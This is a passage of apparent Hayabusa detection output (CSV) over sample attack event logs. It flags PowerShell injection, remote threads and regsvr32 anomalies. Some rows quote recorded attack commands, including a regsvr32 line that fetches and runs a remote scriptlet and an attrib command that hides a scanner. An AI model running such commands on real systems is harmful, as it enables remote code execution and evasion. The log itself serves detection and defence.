Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c 